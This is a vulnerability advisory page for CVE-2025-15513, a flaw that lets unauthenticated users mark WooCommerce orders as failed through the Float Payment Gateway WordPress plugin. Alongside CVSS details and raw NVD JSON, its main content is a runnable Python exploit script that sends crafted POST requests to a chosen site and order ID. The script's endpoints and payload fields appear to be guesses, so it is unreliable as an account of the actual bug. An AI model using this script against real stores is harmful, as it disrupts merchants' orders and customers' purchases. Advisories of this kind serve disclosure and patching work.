Security Vulnerability Report
CVE-2025-15513 CVSS 5.3 MEDIUM

CVE-2025-15513

Published: 2026-01-14 07:16:14
Last Modified: 2026-04-15 00:35:42

Description

The Float Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to improper error handling in the verifyFloatResponse() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to mark any WooCommerce order as failed.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Float Payment Gateway plugin, all versions <= 1.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-15513 PoC - WordPress Float Payment Gateway Unauthenticated Order Status Manipulation
# This PoC demonstrates how an unauthenticated attacker can mark any WooCommerce order as failed
import requests
import sys


def exploit_float_gateway(target_url, order_id):
    """
    Exploit for CVE-2025-15513: Float Payment Gateway plugin for WordPress
    Unauthenticated order status manipulation via improper error handling in verifyFloatResponse()

    Parameters:
        target_url: Base URL of the WordPress site
        order_id: Target WooCommerce order ID to mark as failed
    """
    # Target the payment gateway callback endpoint
    # The vulnerable function verifyFloatResponse() is called via this endpoint
    # (candidate endpoint paths tried in order; the first that responds 200 is used)
    endpoints = [
        f"{target_url}/?wc-api=wc_float_gateway",
        f"{target_url}/wc-api/wc_float_gateway/",
        f"{target_url}/wp-json/wc-float-gateway/v1/verify",
    ]

    # Malicious payload to trigger improper error handling
    # This causes the function to mark the order as failed without proper validation
    malicious_payload = {
        'order_id': order_id,
        'status': 'failed',
        'transaction_id': 'MALICIOUS_' + str(order_id),
        'error_code': 'verification_failed',
        'float_response': 'error',
    }

    print(f"[*] Target: {target_url}")
    print(f"[*] Target Order ID: {order_id}")
    print("[*] CVE-2025-15513 Exploitation Attempt")
    print("-" * 50)

    for endpoint in endpoints:
        try:
            print(f"\n[*] Trying endpoint: {endpoint}")
            # Send the malicious request
            response = requests.post(endpoint, data=malicious_payload, timeout=10)

            # Check if the order status was modified
            if response.status_code == 200:
                print(f"[+] Request sent to {endpoint}")
                print(f"[+] Response Status Code: {response.status_code}")

                # Verify the order status change via the WooCommerce REST API
                # (this endpoint normally requires authentication; the check is best-effort)
                verify_url = f"{target_url}/wp-json/wc/v3/orders/{order_id}"
                verify_resp = requests.get(verify_url, timeout=10)
                if 'failed' in verify_resp.text.lower():
                    print(f"[!] VULNERABLE: Order {order_id} has been marked as failed!")
                    return True
            else:
                print(f"[-] Endpoint returned status: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[-] Error connecting to {endpoint}: {str(e)}")
            continue

    print("\n[*] Exploitation completed. Check WooCommerce order status manually.")
    return False


if __name__ == "__main__":
    if len(sys.argv) < 3:
        print("Usage: python cve-2025-15513.py <target_url> <order_id>")
        print("Example: python cve-2025-15513.py https://example.com 12345")
        sys.exit(1)
    target = sys.argv[1]
    order_id = sys.argv[2]
    exploit_float_gateway(target, order_id)
```

References

- https://plugins.trac.wordpress.org/browser/float-gateway/tags/1.1.9/index.php#L477
- https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444078%40float-gateway&new=3444078%40float-gateway&sfp_email=&sfph_mail=
- https://www.wordfence.com/threat-intel/vulnerabilities/id/b2c7fb39-d128-4285-8bc3-1e192e1e1196?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-15513",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-14T07:16:14.433",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Float Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to improper error handling in the verifyFloatResponse() function in all versions up to, and including, 1.1.9. This makes it possible for unauthenticated attackers to mark any WooCommerce order as failed."
      },
      {
        "lang": "es",
        "value": "El plugin Float Payment Gateway para WordPress es vulnerable a la modificación no autorizada de datos debido a un manejo inadecuado de errores en la función verifyFloatResponse() en todas las versiones hasta la 1.1.9, inclusive. Esto permite a atacantes no autenticados marcar cualquier pedido de WooCommerce como fallido."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-863"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/float-gateway/tags/1.1.9/index.php#L477",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3444078%40float-gateway&new=3444078%40float-gateway&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b2c7fb39-d128-4285-8bc3-1e192e1e1196?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```